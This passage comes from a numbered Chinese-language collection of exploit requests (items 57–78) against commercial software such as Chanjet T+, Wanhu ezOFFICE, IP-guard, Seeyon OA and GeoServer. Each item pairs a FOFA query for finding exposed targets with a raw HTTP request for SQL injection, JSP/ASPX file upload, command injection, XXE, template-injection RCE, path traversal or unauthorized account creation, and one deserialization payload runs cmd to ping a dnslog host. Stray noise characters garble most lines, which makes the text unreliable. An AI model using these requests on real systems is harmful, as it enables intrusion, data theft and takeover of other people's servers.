2 E0 }; k: s. ]4 ^% ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' u! l9 ]; p; k* X% a
Content-Type: application/json
4 N: p' [( s5 |3 w6 l1 ^9 y/ B7 r$ j3 |8 A$ N! Y7 [
{8 \5 F; ?( k9 a
"storeID":{" x \' w' ~% e) u% b
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
4 N8 P9 t' L* O+ n "MethodName":"Start",
3 ?, |: \/ F+ E6 d9 m "ObjectInstance":{$ \0 e( k/ r& G" m9 F/ f1 D
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
5 \" O- F/ N s8 d: g "StartInfo": {8 R# L6 x g# {& Y
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 c1 P1 E7 k% Y* V3 X "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"8 y6 [+ M0 L* @9 ~# P
}8 e' {" U/ F5 W; |
}
- o9 l D. h+ w, w' W" ~. ? p) @: v: N }
/ _2 ~( s# s8 u, B4 z9 n}
1 G) V" ]! }, ?; ]$ K' ]2 J3 k
5 @3 v3 a0 S! d3 |6 B$ q
4 h6 p! G5 l/ G57. 畅捷通T+ keyEdit.aspx SQL注入
& w3 u, X) z$ iFOFA:app="畅捷通-TPlus"
3 @1 i9 T& x% W" K% ?' E4 D# rGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1: `) V! M1 n! T$ ~- ~" J
Host: host
$ _$ c/ }1 s% w' T! }User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ d; t S1 m( r' {' E: b
Accept-Charset: utf-8
1 I: w% m* b- I1 s+ H8 h9 n ~Accept-Encoding: gzip, deflate
! Y) _5 N+ p( J. x/ AConnection: close/ X# t5 d4 I, c* @
1 L* D2 T# M- e( J+ P
+ L5 x' N# {9 J6 a# G/ V58. 畅捷通T+ KeyInfoList.aspx sql注入
/ x/ Q3 V8 [* z0 U0 a* [* d! nFOFA:app="畅捷通-TPlus"- o8 w+ k Q& d' Q3 T; n. Q6 \6 @
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1: t# f, q K% f! v6 C
Host: your-ip
1 k9 k, f4 l0 O2 ]User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% d% u! F# W. y! D/ P
Accept-Charset: utf-8
! f, g8 ]. g$ n+ y8 J$ j% T, r# wAccept-Encoding: gzip, deflate
6 Z! q2 S5 X# C6 C5 E# [6 y- JConnection: close/ o+ d& a% i: C$ g2 ^4 q
* U& b$ ~4 L2 P8 p8 ]. X( `- G' n4 W" k
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
/ H) E6 K( i: u) V+ }9 WFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"; B8 Z( k. R. f Z5 O5 {
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1$ W+ t$ p0 N Q! \
Host: 192.168.86.128:9090
% X$ b+ Y; i5 F" v- C% VUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 c. l1 F7 v* _6 w1 lConnection: close
7 s" o3 { W* |% g5 s6 p5 X6 X& bContent-Length: 1669
+ d- b) m/ P5 a# cAccept: */*
9 n7 A1 b; Y8 X" ^/ q, c9 t/ f& _Accept-Language: en
$ b4 ~* B, P5 S& M& gContent-Type: application/x-www-form-urlencoded
/ J3 g$ H, y2 u0 y; ]) c8 Q; X/ W0 aAccept-Encoding: gzip; ~' z9 K9 i; e8 p. H
8 N9 d3 H' c/ G7 H5 }: a. x% G" kPAYLOAD
W3 c2 @% j0 V- P: d3 `
, u" X. D3 f* Z$ \; L9 S, K! G1 h4 O# z" X+ O4 L: W
60. 百卓Smart管理平台 importexport.php SQL注入. I Z" m+ z9 W1 f
FOFA:title="Smart管理平台"
7 Q! v3 a. M, `- K& e& XGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
( s/ ?7 x& F- W% k. f# t, ^/ sHost:
: d5 S5 R! S* d' bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 Q1 I# P' W. ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# z% V! D* Z, x$ X1 x5 n6 H
Accept-Encoding: gzip, deflate
9 p+ }5 h7 E( d Q! g' k1 l! }- ~( ^Accept-Language: zh-CN,zh;q=0.9- x1 c" H# d8 }, a' U+ r% H3 L2 e
Connection: close# ]- }, \5 j* I ~7 O
( s$ S( ]. U3 Z$ F( @+ ^
7 ]: y- K; V8 n" ]6 K61. 浙大恩特客户资源管理系统 fileupload 任意文件上传5 x9 O) `. M& P5 u
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
9 Q6 j- T: A( F3 \) iPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1/ O3 K0 Y4 D T% H
Host: x.x.x.x9 ^" q' j8 [$ x' l# c. S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 k; ^ U, @: O; a0 u. R% H
Connection: close
# F" T- A n; F( u$ ?0 |) ^7 B; ]* J7 cContent-Length: 27; x! s6 _ C# v) R, o
Accept: */*
1 }5 u( R7 I/ uAccept-Encoding: gzip, deflate2 }8 S/ I* V! Q7 N6 p8 i \
Accept-Language: en
! I& z" T/ l- c: c& Y \Content-Type: application/x-www-form-urlencoded
- h6 d% n \ L
" S! h7 v& C* M3 P! n; H$ g3 m8uxssX66eqrqtKObcVa0kid98xa
! `, a \3 E ]6 s; V3 ^; k2 \7 ]- o& U. c$ V& o, R$ L3 O0 y8 }" f# z
9 Y9 h0 h! n0 x7 ~+ k- j
62. IP-guard WebServer 远程命令执行2 W! W# X8 r) X; O" b2 O' R/ h
FOFA:"IP-guard" && icon_hash="2030860561"! u. t/ e; w- ?! C4 ?+ Q& C
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1$ W6 h+ Y& L5 G- Q& A i
Host: x.x.x.x
8 F; g/ p5 a5 N5 Y8 m! J4 HUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
* y0 x: w. X9 L5 @% w' S) CConnection: close
: [. M7 L& X. S. K: K1 uAccept: */*8 u- ]$ n/ f& E
Accept-Language: en
/ l0 _; a8 I* z" B) f" z- ?4 UAccept-Encoding: gzip6 n/ x, _* w6 J( \+ Z( c
9 [6 b( y$ x' [1 A3 G1 ]) B x! q1 W( T8 A& w
访问
7 [5 k! U" c- i: q: _0 F
. _4 i7 M# e: E1 b3 wGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1( X* E( z/ {0 A, X) L9 R. J
Host: x.x.x.x
; g9 U7 q# p0 ~# v5 n+ D! C& U9 r; ^/ R
' U' t. A% E% V* a* i; z$ J63. IP-guard WebServer任意文件读取1 A: R/ W+ x1 m0 h3 E
IP-guard < 4.82.0609.0) z2 @& r# _0 k; p* v# z1 x; P* k
FOFA:icon_hash="2030860561"
/ N8 x2 g4 i5 s/ F- X5 @POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
0 ~# h4 v. H& p7 d. g6 s( Q4 yHost: your-ip/ D4 Q: C1 {; D) G7 |; [9 l; d- \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 f8 l. G) j- A4 b; e! UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 d3 M' A! I% K9 \' u* i' a3 ]5 v+ ^Accept-Encoding: gzip, deflate
1 `1 [1 _' Z. a0 U/ `' pAccept-Language: zh-CN,zh;q=0.95 @* h6 y) C; q. j3 U% j# M
Connection: close* u4 o; h4 X L# q3 B7 N
Content-Type: application/x-www-form-urlencoded, K: X4 l; X/ k
$ w+ W# E8 I/ V1 ]; W8 X
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
- l2 O g( ^& _$ [# Y V' l* q" w! O8 _( b4 {
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
8 \ O# b8 V6 [' s; ^, S1 D8 qFOFA:body="/Scripts/EnjoyMsg.js": F+ F. H6 b; v1 ?2 j+ ?' n
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1, |3 Q; _+ p& m4 B# W: W
Host: 192.168.86.128:9001
. G( v; i. C& I K% G5 L$ KUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36. Y; U2 M4 |( @
Connection: close
6 [1 Z# o9 I6 x/ `Content-Length: 369. t) Y0 O; ]8 v/ O" T1 v) P2 W, L
Accept: */*
' r; @3 Y6 \/ p. }" K+ OAccept-Language: en0 O" H# b% u) i6 r9 h) D
Content-Type: text/xml; charset=utf-8- s( D# W8 ]& N" H
Accept-Encoding: gzip9 [/ [0 W: t9 y9 N! Y0 `5 o+ P
9 u# O( V1 k% Z7 Y. b
<?xml version="1.0" encoding="utf-8"?>! p* r- [+ ?. P, Y
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' B& g5 V6 i: X
<soap:Body>9 n4 ~; @$ @, N5 A$ X
<GetOSpById xmlns="http://tempuri.org/">
" N7 B: Y# F O <sId>1';waitfor delay '0:0:5'--+</sId>
; u9 L% V& ?3 ^' o, x" M </GetOSpById>; `/ ` X4 Y* Y" p! N1 h
</soap:Body>" F; x+ B" k! i0 e# S
</soap:Envelope>
' X( Q+ @8 H0 F9 J X7 s. M& u
, D2 ^, s: e2 u- k% V& e7 S1 V; H7 P. A! q
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过# k: G$ I1 ~) V `& n" F
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"- @2 W8 e5 [" V) t6 M
响应200即成功创建账号test123456/1234562 G) |7 g+ [7 G2 \% @ }5 L7 T
POST /SystemMng.ashx HTTP/1.1
' C- p9 w6 s- d6 o8 ^! |% JHost:+ O- i) ~! i/ P
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)% h5 M1 r6 W1 p: c9 d I; ^! R2 B
Accept-Encoding: gzip, deflate9 K3 K- x/ }7 [
Accept: */*
1 x- y) \- @4 \. w8 x% ^Connection: close& c+ _8 c. T0 e0 p5 c; r+ `
Accept-Language: en
% V" N$ o4 D; {# [5 m- _5 Q8 g" [5 F2 k; NContent-Length: 174
o5 L" r9 A. g( j/ u# K8 W. p8 o q x1 Q, O2 Y) I, b) o
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators9 r, A' R! V$ ]) u& u+ B! p3 y
+ S- [1 ?. w% w3 |$ l/ m; s( Z$ n3 c
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入! e6 w7 g* G0 O; q
FOFA:app="万户ezOFFICE协同管理平台"
4 @+ e) k8 \ w: l) R$ x# i0 H4 ]7 r, n- t% j: B" x
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1, Q/ F/ [5 ?0 U! T& R9 @9 J
Host: x.x.x.x$ B* z! l( W9 ^: Z5 k2 o* N/ h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! s- m/ r8 q, @7 i l kConnection: close1 I' L% X9 p$ k6 m+ | [ o
Accept: */*
# E! R0 S) ^$ `9 I8 U2 t" MAccept-Language: en
8 B- O6 K% S1 T. KAccept-Encoding: gzip
; L3 E. b9 F% t0 Q5 n3 N& g
, t/ ~4 o; D0 x; O) x
6 f0 z( {0 M& |% m1 h) z6 I9 C第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
* R% B5 }- z8 R+ m& v- ]
# `: p9 C, O, ?& \7 L% T67. 万户ezOFFICE wpsservlet任意文件上传" a3 V% e, V( i5 c3 D* K4 c
FOFA:app="万户网络-ezOFFICE"5 }0 X. t& O9 e
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
6 C& y# |, V% v) P- X8 _3 UPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
* [4 f0 \& q n i4 ^2 ^Host: x.x.x.x
2 a/ k5 ~3 E' q* wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.03 w9 e6 m: K& c, ]. c
Content-Length: 173
" x7 h7 u7 A3 g" a2 f1 s6 N$ {! @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
2 `7 i! t* L5 zAccept-Encoding: gzip, deflate8 y) A# N9 Q- D/ c# z/ w
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
, e* {4 R; s; T; K3 f' e* vConnection: close; X) C) i* m! Y( U& W
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp$ [1 ]( X+ @2 o: E. b# K/ v
DNT: 1
& Z8 V, u, ]5 i3 B1 u/ _. d6 T! LUpgrade-Insecure-Requests: 1, z, s) {+ Q: _5 z) R7 X
8 @$ k- h+ I( K3 ] l+ h--ufuadpxathqvxfqnuyuqaozvseiueerp
3 s7 L f [ e6 t" }. w; z! FContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp") B1 J7 {. `1 _- Q% z7 v+ X: X7 S
, K8 s$ F" Q6 s) i e8 Y<% out.print("sasdfghjkj");%>- e5 T) M7 B. x
--ufuadpxathqvxfqnuyuqaozvseiueerp--- G4 l7 W/ l2 L4 g4 b
7 W1 \+ _) o7 H' z/ k: r5 l
. ?9 x# O) e7 R' f L文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp, T* Y7 E/ t' {
' Q' b2 m/ ^( j4 B9 G68. 万户ezOFFICE wf_printnum.jsp SQL注入
5 [% F. i8 k, N# p' H" Z) nFOFA:app="万户ezOFFICE协同管理平台"
7 _6 ~) g" d% p- IGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 K4 G5 z0 O8 {9 M+ g- R& o) THost: {{host}}
+ s5 Y& ^. L6 \- f5 g+ m- mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
4 M A$ _$ I, \: ]# G4 H6 T8 I5 `Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
! K8 w) Q% Z! U v% n$ t: \& YAccept-Encoding: gzip, deflate( e: E( `: \- d7 z; R U
Accept-Language: zh-CN,zh;q=0.9/ \3 K% J, B- ]- d
Connection: close( F1 p6 K( h- ~& e/ i; y n3 u4 r
# {. b) p) d. l
; ~9 v/ X: x7 c# w
69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 w; q' d' ^* ], D# A) | D6 FFOFA:app="万户ezOFFICE协同管理平台"8 [, `2 i7 p3 {* ~: J4 S
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1- u& z7 F8 N, v4 G1 c
Host: your-ip6 x |, |) f* o6 t
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% v# R% l1 g& U( Y
Accept-Encoding: gzip, deflate
4 Z, J2 U" T; S3 B( mAccept: */*
2 o, ~; [. O2 R8 |" MConnection: keep-alive( N) Y5 w T5 Z8 ]# a3 m
! ]# f) F/ M/ e$ f: b. |7 @
k5 C* a5 ?( m0 V0 n70. 万户ezEIP success 命令执行7 z3 O2 `# l) q+ F; Q( J4 _
FOFA:app="万户网络-ezEIP"; h# H, B3 k s8 N4 W" o& X; s+ N
POST /member/success.aspx HTTP/1.1
; U' T4 n' j# O8 _+ [# sHost: {{Hostname}}
4 K! _9 P' Q2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! R. D0 ?1 ~6 g+ ESID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=, N5 o; @1 A5 O
Content-Type: application/x-www-form-urlencoded
1 t8 q( c' s5 l. E, M! CTYPE: C
3 Z0 i. s* A3 K) Z: W8 yContent-Length: 16702
8 o1 Q. |) q2 s8 e
: |/ J+ P( C( `9 U. ?6 ~. W__VIEWSTATE=PAYLOAD. ?7 V6 D0 S4 }* a
( z; i( _$ X) z; i5 Q5 P1 _7 u" l/ Q8 p( i& f
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入* g% [0 K2 F' \5 y4 d9 `5 o
FOFA:body="PM2项目管理系统BS版增强工具.zip"
{4 b5 ?0 ?4 [4 s4 p! N' X% WGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
0 J q0 ^7 _6 x0 @ c: k- G; sHost: x.x.x.xx.x.x.x3 M1 S% Q6 \6 ]; O: c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 J1 ~4 [( R9 P' s z4 e
Connection: close0 [ a, V) v0 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% {. ^0 L2 g: v% g1 B
Accept-Encoding: gzip, deflate
2 N- p) c. [6 }; M" bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' L9 }3 L9 r8 K0 [: a; Q
Upgrade-Insecure-Requests: 1
, u4 T) d/ y2 \" \* I& q7 I& `2 O2 r, W: X
1 C: o4 c h9 b) \3 r8 Z. U% d72. 致远OA getAjaxDataServlet XXE
8 o3 i \; P( e. W7 i8 I7 \FOFA:app="致远互联-OA"
T) ]2 I1 K$ I5 k7 q7 B" q/ hPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.17 ]( P9 H8 P( S# H# z, Q
Host: 192.168.40.131:8099; ~2 k7 g9 M" K, \* K0 s
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
, q7 l+ Z# t5 f0 P2 {Connection: close4 B. y: B1 L. r8 `1 ]% N
Content-Length: 583$ @; \, B7 V* z' c3 ]1 F9 k
Content-Type: application/x-www-form-urlencoded i% _- O3 K/ d
Accept-Encoding: gzip
# u/ P8 k9 J2 a% p3 V$ ?7 l7 y; E1 Z& b7 r' i, ]& y* R# J4 u$ @9 |
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E+ y* C5 C' ~2 ?# U* {
; \ K& J: s- |, W1 C" Y. S( O, c7 V
73. GeoServer wms远程代码执行, b' \' C( L' R6 \. f
FOFA:icon_hash=”97540678”7 {0 o; q( \# k1 E" J, I
POST /geoserver/wms HTTP/1.1& V9 r" {% h A7 i' R/ ^+ ~
Host:, n. l! b# t. j: {' e$ A/ {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: l% R# v9 D8 e# p1 Q, XContent-Length: 19815 I$ ~( k/ m j1 _
Accept-Encoding: gzip, deflate
2 l% q( A8 h+ v. _& s6 QConnection: close
, Z: T+ d6 C1 K- TContent-Type: application/xml
" L2 P8 N& F3 [5 K3 e! L- uSL-CE-SUID: 32 @/ {4 M$ a9 i+ |: Y) F' S0 c+ K& x! K
" d/ o% K4 P! O/ s) Y. I# d ?PAYLOAD' J/ r1 ]1 l0 z$ J: O% W
* ~. D! h) d7 C3 e/ {8 g2 P; [, `! q) D& ^9 p! E
74. 致远M3-server 6_1sp1 反序列化RCE
% G4 `' i8 I4 j2 \1 i: qFOFA:title="M3-Server"
& ^7 S9 N7 a- U5 P! m* nPAYLOAD7 Q% l* K5 U$ |/ v$ j3 h- E* K
1 H6 T4 [& j6 e( P& A75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
3 L& S: ~) A; H3 h, I zFOFA:app="TELESQUARE-TLR-2005KSH"
) D% d- h7 G& D% l, GGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
3 l7 E% M: q" G& {6 QHost: x.x.x.x
: j6 u% P; \3 G; W6 z1 z. ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' J6 I- J, ]2 T v( ~Connection: close1 ?) L2 o% n0 C" R. O G
Accept: */*8 n3 S! }4 X' ?. E( W: G& G4 {
Accept-Language: en8 V& v! r( K- `. _
Accept-Encoding: gzip
. R" ]7 N& W; V. l! Y
0 C2 a3 m1 T8 W- _+ C$ ]3 P V& `( Z- Z# y0 C" i
GET /cgi-bin/test28256.txt HTTP/1.1
2 ` a( A( \' q0 B3 S, E7 c FHost: x.x.x.x4 ]8 l' u2 ]) V! `" D3 {. I
/ w& n0 O& K0 V
8 a' G9 E5 I1 t) N: e# ?- d# o/ G76. 新开普掌上校园服务管理平台service.action远程命令执行
0 V$ Y2 w9 x$ H1 PFOFA:title="掌上校园服务管理平台"" @( X: S6 Q* {0 o; B
POST /service_transport/service.action HTTP/1.1
9 L2 T+ c2 r0 PHost: x.x.x.x- A7 o5 L8 D) G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0/ x2 S; F2 l" t9 Z
Connection: close
/ u1 F; T% ^2 x1 R" t0 @8 fContent-Length: 211$ E! ^1 c5 C2 E7 ~: u2 M! {2 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ U- |" E# Q {
Accept-Encoding: gzip, deflate
! V& F U+ g* K; O$ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. T1 O0 P/ R3 [7 mCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
5 c3 D; D0 u% L* WUpgrade-Insecure-Requests: 1$ N- _$ F# W, \# n# t$ h' M; p
; b2 B% m2 n9 b3 @" y
{- b2 h5 W; {. F# [, \2 g/ l
"command": "GetFZinfo",
( e/ {) H, ]* q5 ? R "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"$ h5 G; @2 z+ S- p% f7 H
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
- O4 a- c% f7 S, W}
. N1 m/ o8 A* t9 U
; l. M% i& F: {
2 X8 T/ u- R ~- |GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1' [1 u. l. f' a$ c
Host: x.x.x.x
% \4 X$ ^" c" `$ s, m$ R1 S
/ Q) R. {: d& {# k+ k
' V- d5 ?! O9 P
. h' F2 |6 o' C0 m77. F22服装管理软件系统UploadHandler.ashx任意文件上传7 ?; j. k, N- S0 K7 }2 {6 i, X: A5 j
FOFA:body="F22WEB登陆"
; R( ?( ^7 h; A( ePOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1* T/ N4 C' ?: ^* N$ x- s! h6 r
Host: x.x.x.x- |' q5 o& P+ s- p$ b s( M) A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- t- S: P3 J" y% L' c! Y$ x/ {
Connection: close
. X1 k8 M; T. KContent-Length: 433
K7 @, u' b; AAccept: */*4 n$ G3 d; y; F; G7 s: `8 K0 F7 r
Accept-Encoding: gzip, deflate
0 ? _6 u+ A1 f3 E+ V3 ?) y7 @ gAccept-Language: zh-CN,zh;q=0.98 P7 A' b: N# D$ |5 }. r
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix2 M, q/ `3 f# M1 y' ?( [
+ a+ [/ p% y7 ^- w" q& v
------------398jnjVTTlDVXHlE7yYnfwBoix" l# k3 Z w4 k% `
Content-Disposition: form-data; name="folder"
3 G1 [; u- q8 B# ^3 U+ n
+ a1 |" f$ B. ^; g+ D, w5 p# i! \2 y/upload/udplog" U9 N0 [1 p! m( b5 i! q
------------398jnjVTTlDVXHlE7yYnfwBoix
* e, c2 J, V2 f: t4 z7 G8 [Content-Disposition: form-data; name="Filedata"; filename="1.aspx"7 N" a: V' [* C4 n% a% a
Content-Type: application/octet-stream
6 @! D6 K. u4 A7 |
j; Z; L; B( Z7 Z# Ghello12345672 _$ d( j5 I2 n. R9 h
------------398jnjVTTlDVXHlE7yYnfwBoix4 x" q5 ]4 h3 G
Content-Disposition: form-data; name="Upload"! r7 i; ?0 H/ A/ D
3 V! r7 R# h# B" kSubmit Query
" k3 a: w" H1 z5 b4 n7 V$ [. T------------398jnjVTTlDVXHlE7yYnfwBoix--
4 t; a! H5 |/ V( d
% \- ^! W8 d( v" H; C( ~$ b+ [! L, H2 `; S3 G/ e
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- z7 I$ Y9 {, I* u
FOFA:icon_hash="2001627082"' R" Z/ i v7 K
POST /Platform/System/FileUpload.ashx HTTP/1.1, Y9 e3 I5 ?0 {9 N0 A3 @4 z+ y# X
Host: x.x.x.x* `9 J" }* b( d! V% D9 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 J1 T2 o3 y0 [8 \% x- M
Connection: close
1 ~/ I1 K/ x6 k" i ?1 g" pContent-Length: 3362 `! A1 x9 b* P2 V; p
Accept-Encoding: gzip
/ D: S0 V8 R f6 _. S# l: VContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l6 f. v/ T9 @9 m- H. h1 J, n& }7 h. s
4 f8 M7 r P( D
------YsOxWxSvj1KyZow1PTsh98fdu6l
4 D! U1 u( z& u! G9 S6 YContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"2 O; N+ A0 b4 ?, M8 o2 {) a# x
Content-Type: image/png
. L: D) r4 W* J' w1 @. [3 c" ~, x9 z' |5 A5 d" [( G6 d4 w
YsOxWxSvj1KyZow1PTsh98fdu6l
]' X) S* h$ |5 j& p6 o------YsOxWxSvj1KyZow1PTsh98fdu6l
